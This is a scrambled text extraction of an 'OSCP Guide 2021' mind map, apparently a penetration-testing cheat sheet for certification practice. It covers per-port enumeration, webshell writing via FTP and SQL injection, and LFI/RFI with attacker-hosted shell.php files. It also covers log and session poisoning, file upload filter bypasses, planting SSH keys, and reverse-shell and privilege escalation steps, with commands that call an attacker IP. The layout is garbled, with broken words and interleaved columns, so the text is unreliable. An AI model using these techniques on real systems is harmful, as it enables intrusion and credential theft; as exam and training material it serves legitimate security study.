‎File Read  ‎Possible Any confidential Information 

‎Anonymous Login 
‎Possible Filewrite to access through Web 
‎File Write 
‎21/FTP ‎FTP to file upload ==> Execute from web == webshell

‎ assword Checking if you found with other

P
‎enum ‎maybe brute-force

‎ assword Checking if you found with other

P
‎No Brute-Force 99.99%
‎22/SSH ‎enum

‎ sername Enumration which can be

U
‎25/SMTP ‎chained to other vulnerability


‎DIR  ‎For finding hidden directories and files

‎Gobuster 
‎DNS  ‎For finding Subdomains
‎80|443/HTTP/S

‎NIKTO  ‎Having quick information for the web stuff

‎Read Permission ‎Possible Confidential file to be available

‎ ossible file uplaod to execute through

P
‎Write Permission ‎web service
‎Null Session 
‎Accessing Without Creds
‎ or checking What are the shares to
F
‎smbmap ‎available with permission information

‎Tools
‎ or connecting to SMB server for accessing
F
‎139|445/SMB  ‎smbclient ‎those shares which are available to access

‎Read Permission ‎Possible Confidential file to be available

‎ ossible file uplaod to execute through

P
‎Write Permission ‎web service
‎Guest Session 
‎Accessing with any username
‎ or checking What are the shares to
F
‎smbmap ‎available with permission information

‎Tools
‎ or connecting to SMB server for accessing
F
‎smbclient ‎those shares which are available to access

‎USERname Enumaration
‎135/RPC  ‎rpcclient -U '%' -N <IP>
‎Network Enum ‎Tool ‎RPCCLIENT

‎Read Access ‎Possible Confidential file to be available

‎ ossible file uplaod to execute through

P
‎Write Access ‎web service
‎2049/NFS  ‎Open NFS share
‎mount ‎For mounting Share available
‎Tools
‎showmount ‎For finding shares available

‎Try login without password

‎ an be used for checking passwords found

c
‎3306/MYSQL  ‎If not (Unauthorized)
‎via diffrent service

‎Tools ‎mysql (Client)

‎With Password
‎5985|5986/WINRM/S  ‎Remotly Windows Machine Access ‎Evil-Winrm(Tool)
‎With Hash

‎try login with creds you have.

‎ se different clients like remmina if you

u
‎3389/RDP ‎see any errors with other client


I‎ f logged in share folder to transfer files

‎through remmina

‎ ccess Critical information about target

A
‎system

‎161/SNMP 
‎snmp-check
‎Tools
‎snmpwalk

‎ an be used for getting information about

C
‎53/DNS  ‎subdomains

‎ o get information about users read /etc/

T
‎SSH Private Keys ‎passwd

‎ ayloadAllTheThings LFI list for finding

P
‎By Reading Files 
‎other critical information

‎Function ‎LOAD_FILE('<FILE LOCATION>')

‎Webshell Writing in Web-Hosting Directory ‎To Find WebHosting Directory Use LFI list

‎TO SHELL  ‎FILE Pemission

‎ or Windows use \\<Attacker IP>\
F
‎sharename\anyfilename to get hash for the ‎Responder tool
‎user

‎into dumpfile '<FILE LOCATION>' ‎Binary Mode

‎Function
‎By Writing Files  ‎into outfile '<FILE LOCATION>' ‎Ascii mode

‎Oneliner ‎Priority

‎SQLinjection ‎Windows ‎P0wnyShell

1‎ ) Check low privilege Shell permission ( ‎b374k

‎whoami /priv) and try exploiting vuln X

‎Webshells which can be used
‎Oneliner ‎Priority
‎ ) Check Software Installation Directory
2
‎Read Names carefully ‎And find suspecious programs that are ‎Linux ‎P0wnyShell
‎installed

‎b374k
‎ ) Check for Weak permissions in services
3
‎and its binpath

‎Manual Approaches ‎ o Get Information about Databases,
T ‎ ind Username password & try same with
F
‎Tables
 ‎other services like ssh,winrm,etc
‎ ) Check for Unquoted Service Path
4
‎Vulnerability

‎Attacker ‎tcpdump -i <tun0> -n ICMP
‎Windows
‎5) Check For Service Registry permissions 
‎Target ‎Ping -c 1 <Attacker IP>
‎Windows
‎Vulnerability Exist 
‎6) Check Scheduled Tasks 
‎Attacker ‎tcpdump -i <tun0> -n ICMP
‎Linux
‎Fails to Check Vulnerable Softwares ‎PowerUp 
‎Target ‎Ping -n 1 <Attacker IP>

‎its like using sword for sewing ...... ‎WinPEAS  ‎Automated (best for beginners)
‎Attacker ‎Python3 -m http.server <PORT to test>
s‎ ometimes creator forgot to use latest OS ‎Check ‎Windows
‎and this can be a luck time for you and ‎Windows exploit suggester.
‎Target ‎Powershell wget http://<AttackerIP:PORT/test>
‎you might find something.

‎Privilege Escalation ‎Attacker ‎Python3 -m http.server <PORT to test>

‎Check For Sudoers Misconfigurations 

‎ ort which can be used for Getting LAN

P ‎Linux I‎ f recived connection to the port use that
‎Check For SUID permissions  ‎wget http://<Attacker IP>:PORT/test
‎shell ‎for getting reverse shell
‎Target
‎Check Services Running on root  ‎curl http://<Attacker IP>:PORT/test
‎Manual Approaches

‎keep eyes on 127.0.0.1 ‎Check Internal Ports  ‎Windows ‎21,22,25,80,443,445,53,123 ‎Priority 445
‎Common Ports which works all the time
‎compare with nmap result you have  ‎Check ports blocked by firewall ‎Linux ‎21,22,25,80,443,445,53,123 ‎Priority 22

‎Unix ‎Command Injection 

‎Check Kernal Version and exploits  ‎ se wget command to write a web-shell to
U
‎linkedin.com/in/rikunj/ ‎the web-hosting directory
I‎ ts allowed for enumeration but not for ‎LSE (best)  ‎Web-shell method
‎exploitation and in recent changes of ‎ sing Curl command Writing Web-shell in
U
‎linpeas it has implemented exploitation ‎web-hosting directory
‎linPEAS  ‎Automated (best for beginners)
‎too which is not allowed. so simple find
‎vuln and exploit that manually (not just ‎mkpsrevshell
‎by execution linpeas). ‎lin Enum 

‎Windows ‎Powershell Nishang shell

‎Path Sometimes Changed

‎OSCP Guide 2021 ‎nc.exe upload

‎using Alternative command (SHELLCODE)

‎V2 ‎Telegram: https://t.me/R0B077
‎ fter Checking if ping is working and port
A
‎LAN-Shell Method ‎connection verified (IMP) ‎nc
‎Automated Exploits ‎Exploit
‎Google Linux Reverse Shell CheetSheet
‎ ometime Exploits Contains proxies
S
‎Making Dev-Exploits to final ‎python
‎configurations

‎Solving errors ‎Linux ‎ruby

‎Modifications
‎Find Automated one ‎bash
‎ hangelogs.
C
‎read and understand complete
‎1) added ref links on each topics ‎many
‎2) minor changes
‎ se logics as most of the time instruction
u ‎Instruction Based Exploits ‎ nly works if user is not daemon (service
o
‎based exploits requires to fully understand ‎3) added couple more vuln and ‎user like apache or www-data)
‎concepts ‎enum
‎SSH method 
‎ pload public key of attacker to /home/<
U
‎ eeds less modifications but it requires
N ‎if folder is not exist create it ;)
‎USER>/.ssh/authorized_keys
‎like. changing path or maybe finding path
‎ ry to access logs for the diffrent serivces
T
‎ earch on google with CVE number and
S ‎Exploitation ‎running i.e ftp,smb,http
‎find blogs, exploits from github, papers etc.

‎Finding Alternatives I‎ f any of the log file is accesibble check if

s‎ earchsploit will help for quick list all ‎log poisioning
‎your input is reflacting
‎thoses

‎to get log files location use LFI list

t‎ ry all exploits if no version information
‎disclosed as sometimes its obfuscated ‎TO SHELL 
‎Try accessing session file
‎Exploiting With right way
‎Focus on critical vulnerabilities more
‎Payload All The things
‎ ractice more on Vanilla B0f AKA stack
P ‎To get session file location
‎Session Poisioning  ‎<?php echo session_save_path(); ?>
‎based b0f ‎BufferOverflow  ‎On any linux Machines
‎LFI
‎ ead your cookie value and modify same
R
‎Add your session id (IMP) ‎with file name

‎SSH Private Key ‎For getting user location read /etc/passwd

‎Reading Confidential File 
‎Config Files ‎Use payloadallthethings LFI list
‎Vulnerabilities Specific
‎Attacker ‎Python3 -m http.server <PORT to test>
‎Windows
‎Target ‎change RFI param value to http://<Attacker_IP:PORT>/test

‎Attacker ‎Python3 -m http.server <PORT to test>

‎ ort which can be used for Getting LAN
P
‎Start with ‎shell ‎Linux
‎ hange RFI param value to http://<
c
‎Target ‎Attacker_IP:PORT>/test

‎Windows ‎21,22,25,80,443,445,53,123 ‎Priority 445

‎Common Ports which works all the time
‎Linux ‎21,22,25,80,443,445,53,123 ‎Priority 22

‎RFI
‎ oogle windows php reverse shell and use
G
‎that
‎Windows
‎Oneliner ‎best

‎google Linux php reverse shell and use that

‎Linux
‎Once Port found to be used  ‎Oneliner ‎best

‎ ttp://<Attacker_IP>:<PORT>/shell.php&
h
‎payload should be ‎cmd=whoami
‎? And & makes a huge diffrence
‎TIPS
‎ ttp://<Attacker_IP>:<PORT>/shell.php?
h
‎payload should not be ‎cmd=whoami

‎oneliner 

‎p0wny 
‎shells
‎b374k 

‎msfvenom 

‎ odify first few bytes or signature with

M
‎magic bytes bypass  ‎png signature

‎php ‎use double extension as below

‎php.png
‎file extension bypass AKA double extensions 
‎php,jpeg

‎php.gif
‎WIndows IIS & Apacher httpd

‎Similar extensions  ‎php/php4/php5/phtml

‎bypasses
I‎ f data sends file size param modify value
‎to something which is higer
‎File Size check (client check only) 
‎use oneliner or smaller shells

‎ heck for the content type header and

C
‎modify as below

‎image/png

‎Content type Check  ‎Intercept request through burp ‎image/jpeg

‎image/gif

‎text/plain

‎Web-Enum ‎Uploading File

‎ oogle ASPX shell and use those webshell
G
‎and follow web-shell to lan shell method
‎as shows earlier
‎Shells
‎create ASP/X reverse shell with msfvenom

‎ heck for the content type header and

C
‎modify as below

‎asp/aspx ‎image/png
‎Windows IIS server
‎Content type Check ‎Intercept request through burp ‎image/jpeg

‎image/gif

‎Bypasses ‎text/plain

I‎ f data sends file size param modify value

‎File Upload
‎to something which is higer
‎File Size check (client check only)
‎use oneliner or smaller shells

‎ oogle jsp shell and use those webshell

G
‎and follow web-shell to lan shell method
‎Shells ‎as shows earlier
‎For Apache Tomcat
‎jsp
‎ reate JSP shell with msfvenom and use
C
‎Bypasses ‎that

‎ o a dictionary based attack to find all the

D
‎hidden directory
‎gobuster
‎gobuster dir -w <wordlist> -u http://<IP>:PORT/ -t 100

‎Do fuzzing with dictionary based attack

‎ffuf
‎Accesing File ‎ffuf -w <wordlist -u http://<IP:PORT>/FUZZ/filename_you_uploaded.php -t 100 -fc 200

‎directory list 2-3 big.txt

‎seclist 
‎raft wordlist
‎Best Directory wordlist

‎wordlist ‎dirbuster directory list 2.3 big or medium

‎Source Code

‎Finding ‎Login page

‎Comments

‎ ont use any exploit which is related to xss/xsrf and so on focus on

D
‎vulnerability which i mentioned up

‎CMS
‎ ry finding github exploits as those are
T
‎Validating
‎better sometimes

‎Don't trust versions everytime

‎validate first
‎Exploiting ‎follow earlier topic checks and validation
‎use right port to get LAN shell

‎Wordpress ‎WPscan  ‎read manual

‎ ustom exploits takes place here you

C
‎might have to find vulnerability on your
‎own from the list above
‎Other
‎X-Forwarded-For to accesing 403 page 